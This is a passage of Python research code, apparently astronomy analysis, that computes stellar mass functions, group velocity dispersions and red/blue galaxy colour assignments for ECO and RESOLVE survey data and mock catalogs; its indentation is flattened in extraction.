# mean = np.mean(cen_deltav_arr)
for value in cen_deltav_arr:
# print(mean)
# print(np.mean(cen_deltav_arr))
diff = value - mean
diff_sqrd = diff**2
diff_sqrd_arr.append(diff_sqrd)
mean_diff_sqrd = np.mean(diff_sqrd_arr)
std = np.sqrt(mean_diff_sqrd)
# print(std)
# print(np.std(cen_deltav_arr))
std_arr.append(std)
return std_arr
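# Sanity sketch: per bin this reduces to the RMS about zero,
# np.sqrt(np.mean(np.square(values_in_bin))); the hand-rolled loop keeps the
# mean fixed at 0 instead of using the sample mean.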
def get_deltav_sigma_data(df):
"""
Measure spread in velocity dispersion separately for red and blue galaxies
by binning up central stellar mass (changes logmstar units from h=0.7 to h=1)
Parameters
----------
df: pandas Dataframe
Data catalog
Returns
---------
std_red: numpy array
Spread in velocity dispersion of red galaxies
centers_red: numpy array
Bin centers of central stellar mass for red galaxies
std_blue: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue: numpy array
Bin centers of central stellar mass for blue galaxies
"""
catl = df.copy()
if survey == 'eco' or survey == 'resolvea':
catl = catl.loc[catl.logmstar >= 8.9]
elif survey == 'resolveb':
catl = catl.loc[catl.logmstar >= 8.7]
catl.logmstar = np.log10((10**catl.logmstar) / 2.041)
red_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'R') & (catl.g_galtype == 1)].values)
blue_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'B') & (catl.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups with a
# red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = catl.loc[catl.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func_mod(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
# Calculating spread in velocity dispersion for galaxies in groups with a
# blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = catl.loc[catl.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func_mod(blue_stellar_mass_bins, blue_cen_stellar_mass_arr,
blue_deltav_arr)
std_blue = np.array(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
return std_red, centers_red, std_blue, centers_blue
def get_sigma_per_group_data(df):
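    """
    Calculate mean central stellar mass in bins of group velocity dispersion
    (sigma) for groups with red and blue centrals in the data
    """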
catl = df.copy()
if survey == 'eco' or survey == 'resolvea':
catl = catl.loc[catl.logmstar >= 8.9]
elif survey == 'resolveb':
catl = catl.loc[catl.logmstar >= 8.7]
catl.logmstar = np.log10((10**catl.logmstar) / 2.041)
red_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'R') & (catl.g_galtype == 1)].values)
blue_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'B') & (catl.g_galtype == 1)].values)
red_singleton_counter = 0
red_sigma_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = catl.loc[catl.groupid == key]
if len(group) == 1:
red_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
red_sigma_arr.append(sigma)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
blue_singleton_counter = 0
blue_sigma_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = catl.loc[catl.groupid == key]
if len(group) == 1:
blue_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
blue_sigma_arr.append(sigma)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
mean_stats_red = bs(red_sigma_arr, red_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
mean_stats_blue = bs(blue_sigma_arr, blue_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
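    # Note: binned_statistic is called with sigma as the binned variable and
    # central stellar mass as the statistic, i.e. mean M* in sigma bins spanning
    # 0-250 km/s.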
centers_red = 0.5 * (mean_stats_red[1][1:] + \
mean_stats_red[1][:-1])
centers_blue = 0.5 * (mean_stats_blue[1][1:] + \
mean_stats_blue[1][:-1])
return mean_stats_red, centers_red, mean_stats_blue, centers_blue
def diff_smf(mstar_arr, volume, h1_bool, colour_flag=False):
"""
Calculates differential stellar mass function in units of h=1.0
Parameters
----------
mstar_arr: numpy array
Array of stellar masses
volume: float
Volume of survey or simulation
h1_bool: boolean
        True if units of masses are h=1, False if units of masses are not h=1
    colour_flag: string or boolean, optional
        'R' or 'B' to select the red/blue bin definitions for ECO
Returns
---------
maxis: array
Array of x-axis mass values
phi: array
Array of y-axis values
err_tot: array
Array of error values per bin
bins: array
        Array of bin edge values
    counts: array
        Array of raw galaxy counts per bin
"""
if not h1_bool:
# changing from h=0.7 to h=1 assuming h^-2 dependence
logmstar_arr = np.log10((10**mstar_arr) / 2.041)
else:
logmstar_arr = np.log10(mstar_arr)
if survey == 'eco' or survey == 'resolvea':
bin_min = np.round(np.log10((10**8.9) / 2.041), 1)
if survey == 'eco' and colour_flag == 'R':
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 6
elif survey == 'eco' and colour_flag == 'B':
bin_max = np.round(np.log10((10**11) / 2.041), 1)
bin_num = 6
elif survey == 'resolvea':
# different to avoid nan in inverse corr mat
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 7
else:
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 7
bins = np.linspace(bin_min, bin_max, bin_num)
elif survey == 'resolveb':
bin_min = np.round(np.log10((10**8.7) / 2.041), 1)
bin_max = np.round(np.log10((10**11.8) / 2.041), 1)
bins = np.linspace(bin_min, bin_max, 7)
# Unnormalized histogram and bin edges
counts, edg = np.histogram(logmstar_arr, bins=bins) # paper used 17 bins
dm = edg[1] - edg[0] # Bin width
maxis = 0.5 * (edg[1:] + edg[:-1]) # Mass axis i.e. bin centers
# Normalized to volume and bin width
err_poiss = np.sqrt(counts) / (volume * dm)
err_tot = err_poiss
phi = counts / (volume * dm) # not a log quantity
phi = np.log10(phi)
return maxis, phi, err_tot, bins, counts
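# Usage sketch (hypothetical numbers): for ECO, diff_smf(logmstar_arr, 151829.26,
# h1_bool=False) shifts masses to h=1 units, bins them into the survey's mass
# bins (selected via the module-level `survey` flag), and returns log10(phi).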
def get_err_smf_mocks(survey, path):
"""
    Calculate red and blue SMFs from survey mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
    phi_arr_red: array
        SMF (phi) values for red galaxies, one row per mock
    phi_arr_blue: array
        SMF (phi) values for blue galaxies, one row per mock
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
max_arr_red = []
max_arr_blue = []
colour_corr_mat_inv = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
logmstar_arr = mock_pd.logmstar.values
u_r_arr = mock_pd.u_r.values
colour_label_arr = np.empty(len(mock_pd), dtype='str')
for idx, value in enumerate(logmstar_arr):
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
elif value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
elif value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
mock_pd['colour_label'] = colour_label_arr
#Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, False, 'R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, False, 'B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
max_arr_red.append(max_red)
max_arr_blue.append(max_blue)
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
max_arr_red = np.array(max_arr_red)
max_arr_blue = np.array(max_arr_blue)
# Covariance matrix for total phi (all galaxies)
cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
err_total = np.sqrt(cov_mat.diagonal())
return phi_arr_red, phi_arr_blue
def get_deltav_sigma_mocks_urcolour(survey, path):
"""
Calculate spread in velocity dispersion from survey mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
std_red_arr = []
centers_red_arr = []
std_blue_arr = []
centers_blue_arr = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & \
(mock_pd.M_r.values <= mag_limit) & \
(mock_pd.logmstar.values >= mstar_limit)]
logmstar_arr = mock_pd.logmstar.values
u_r_arr = mock_pd.u_r.values
colour_label_arr = np.empty(len(mock_pd), dtype='str')
            # Using definitions from the Moffett paper
for idx, value in enumerate(logmstar_arr):
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
elif value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
elif value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
mock_pd['colour_label'] = colour_label_arr
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.5,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
std_red_arr.append(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.5,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
std_blue_arr.append(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red_arr.append(centers_red)
centers_blue_arr.append(centers_blue)
std_red_arr = np.array(std_red_arr)
centers_red_arr = np.array(centers_red_arr)
std_blue_arr = np.array(std_blue_arr)
centers_blue_arr = np.array(centers_blue_arr)
return std_red_arr, std_blue_arr, centers_red_arr, centers_blue_arr
def get_deltav_sigma_mocks_qmcolour_mod(survey, path):
"""
Calculate spread in velocity dispersion from survey mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
std_red_arr = []
centers_red_arr = []
std_blue_arr = []
centers_blue_arr = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & \
(mock_pd.M_r.values <= mag_limit) & \
(mock_pd.logmstar.values >= mstar_limit)]
            # NOTE: hybrid_quenching_model expects (theta, gals_df, mock); the
            # quenching parameters theta must be supplied, as in get_err_data_mod
            f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
std_red_arr.append(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
std_blue_arr.append(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red_arr.append(centers_red)
centers_blue_arr.append(centers_blue)
std_red_arr = np.array(std_red_arr)
centers_red_arr = np.array(centers_red_arr)
std_blue_arr = np.array(std_blue_arr)
centers_blue_arr = np.array(centers_blue_arr)
return std_red_arr, std_blue_arr, centers_red_arr, centers_blue_arr
def get_deltav_sigma_mocks_qmcolour(survey, mock_df):
"""
Calculate spread in velocity dispersion from survey mocks (logmstar converted
to h=1 units before analysis)
Parameters
----------
survey: string
Name of survey
    mock_df: pandas DataFrame
        Mock catalog
    Returns
    ---------
    std_red: numpy array
        Spread in velocity dispersion of red galaxies
    std_blue: numpy array
        Spread in velocity dispersion of blue galaxies
    centers_red: numpy array
        Bin centers of central stellar mass for red galaxies
    centers_blue: numpy array
        Bin centers of central stellar mass for blue galaxies
"""
mock_pd = mock_df.copy()
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func_mod(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func_mod(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red = np.array(centers_red)
centers_blue = np.array(centers_blue)
return std_red, std_blue, centers_red, centers_blue
def get_host_halo_mock(gals_df, mock):
"""
Get host halo mass from mock catalog
Parameters
----------
    gals_df: pandas dataframe
        Mock catalog
    mock: string
        Mock type; 'vishnu' uses halo_mvir, otherwise 10**loghalom is used
Returns
---------
cen_halos: array
Array of central host halo masses
sat_halos: array
Array of satellite host halo masses
"""
df = gals_df.copy()
# groups = df.groupby('halo_id')
# keys = groups.groups.keys()
# for key in keys:
# group = groups.get_group(key)
# for index, value in enumerate(group.cs_flag):
# if value == 1:
# cen_halos.append(group.loghalom.values[index])
# else:
# sat_halos.append(group.loghalom.values[index])
if mock == 'vishnu':
cen_halos = []
sat_halos = []
for index, value in enumerate(df.cs_flag):
if value == 1:
cen_halos.append(df.halo_mvir.values[index])
else:
sat_halos.append(df.halo_mvir.values[index])
else:
cen_halos = []
sat_halos = []
for index, value in enumerate(df.cs_flag):
if value == 1:
cen_halos.append(10**(df.loghalom.values[index]))
else:
sat_halos.append(10**(df.loghalom.values[index]))
cen_halos = np.array(cen_halos)
sat_halos = np.array(sat_halos)
return cen_halos, sat_halos
def get_stellar_mock(gals_df, mock, randint=None):
"""
Get stellar mass from mock catalog
Parameters
----------
    gals_df: pandas dataframe
        Mock catalog
    mock: string
        Mock type; 'vishnu' reads stellar masses from the `randint` column
    randint: int, optional
        Column key for stellar masses in vishnu mocks
Returns
---------
cen_gals: array
Array of central stellar masses
sat_gals: array
Array of satellite stellar masses
"""
df = gals_df.copy()
if mock == 'vishnu':
cen_gals = []
sat_gals = []
for idx,value in enumerate(df.cs_flag):
if value == 1:
cen_gals.append(10**(df['{0}'.format(randint)].values[idx]))
elif value == 0:
sat_gals.append(10**(df['{0}'.format(randint)].values[idx]))
else:
cen_gals = []
sat_gals = []
for idx,value in enumerate(df.cs_flag):
if value == 1:
cen_gals.append((10**(df.logmstar.values[idx]))/2.041)
elif value == 0:
sat_gals.append((10**(df.logmstar.values[idx]))/2.041)
cen_gals = np.array(cen_gals)
sat_gals = np.array(sat_gals)
return cen_gals, sat_gals
def hybrid_quenching_model(theta, gals_df, mock, randint=None):
"""
Apply hybrid quenching model from Zu and Mandelbaum 2015
Parameters
----------
    theta: array
        Quenching parameters [Mstar_q, Mh_q, mu, nu]
    gals_df: pandas dataframe
        Mock catalog
    mock: string
        Mock type; 'vishnu' selects different halo and stellar mass columns
    randint: int, optional
        Column key for stellar masses in vishnu mocks
Returns
---------
f_red_cen: array
Array of central red fractions
f_red_sat: array
Array of satellite red fractions
"""
# parameter values from Table 1 of Zu and Mandelbaum 2015 "prior case"
Mstar_q = theta[0] # Msun/h
Mh_q = theta[1] # Msun/h
mu = theta[2]
nu = theta[3]
cen_hosthalo_mass_arr, sat_hosthalo_mass_arr = get_host_halo_mock(gals_df, \
mock)
cen_stellar_mass_arr, sat_stellar_mass_arr = get_stellar_mock(gals_df, mock, \
randint)
f_red_cen = 1 - np.exp(-((cen_stellar_mass_arr/(10**Mstar_q))**mu))
g_Mstar = np.exp(-((sat_stellar_mass_arr/(10**Mstar_q))**mu))
h_Mh = np.exp(-((sat_hosthalo_mass_arr/(10**Mh_q))**nu))
f_red_sat = 1 - (g_Mstar * h_Mh)
return f_red_cen, f_red_sat
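# Worked check (illustrative numbers): with the best-fit hybrid parameters used
# below (Mstar_q = 10.49, mu = 0.69), a central of M* = 10^11 Msun/h gives
# f_red_cen = 1 - exp(-(10**(11 - 10.49))**0.69) ~ 0.89, i.e. most likely quenched.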
def assign_colour_label_mock(f_red_cen, f_red_sat, gals_df, drop_fred=False):
"""
Assign colour label to mock catalog
Parameters
----------
f_red_cen: array
Array of central red fractions
f_red_sat: array
Array of satellite red fractions
gals_df: pandas Dataframe
Mock catalog
drop_fred: boolean
Whether or not to keep red fraction column after colour has been
assigned
Returns
---------
df: pandas Dataframe
Dataframe with colour label and random number assigned as
new columns
"""
# Copy of dataframe
df = gals_df.copy()
# Saving labels
color_label_arr = [[] for x in range(len(df))]
rng_arr = [[] for x in range(len(df))]
# Adding columns for f_red to df
df.loc[:, 'f_red'] = np.zeros(len(df))
df.loc[df['cs_flag'] == 1, 'f_red'] = f_red_cen
df.loc[df['cs_flag'] == 0, 'f_red'] = f_red_sat
# Converting to array
f_red_arr = df['f_red'].values
# Looping over galaxies
for ii, cs_ii in enumerate(df['cs_flag']):
# Draw a random number
rng = np.random.uniform()
# Comparing against f_red
if (rng >= f_red_arr[ii]):
color_label = 'B'
else:
color_label = 'R'
# Saving to list
color_label_arr[ii] = color_label
rng_arr[ii] = rng
## Assigning to DataFrame
df.loc[:, 'colour_label'] = color_label_arr
df.loc[:, 'rng'] = rng_arr
    # Dropping 'f_red' column
if drop_fred:
df.drop('f_red', axis=1, inplace=True)
return df
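# Note (sketch): the per-galaxy loop above is equivalent to one vectorized draw,
# assuming an independent uniform per galaxy:
#     rng = np.random.uniform(size=len(df))
#     df['colour_label'] = np.where(rng >= df['f_red'].values, 'B', 'R')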
def get_sigma_per_group_mocks_qmcolour(survey, mock_df):
"""
    Calculate mean central stellar mass in bins of group velocity dispersion
    (sigma) from survey mocks (logmstar converted to h=1 units before analysis)
    Parameters
    ----------
    survey: string
        Name of survey
    mock_df: pandas DataFrame
        Mock catalog
    Returns
    ---------
    mean_stats_red: binned_statistic result
        Mean central stellar mass of red-central groups in bins of sigma
    centers_red: numpy array
        Bin centers of sigma for groups with red centrals
    mean_stats_blue: binned_statistic result
        Mean central stellar mass of blue-central groups in bins of sigma
    centers_blue: numpy array
        Bin centers of sigma for groups with blue centrals
"""
mock_pd = mock_df.copy()
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
red_singleton_counter = 0
red_sigma_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
if len(group) == 1:
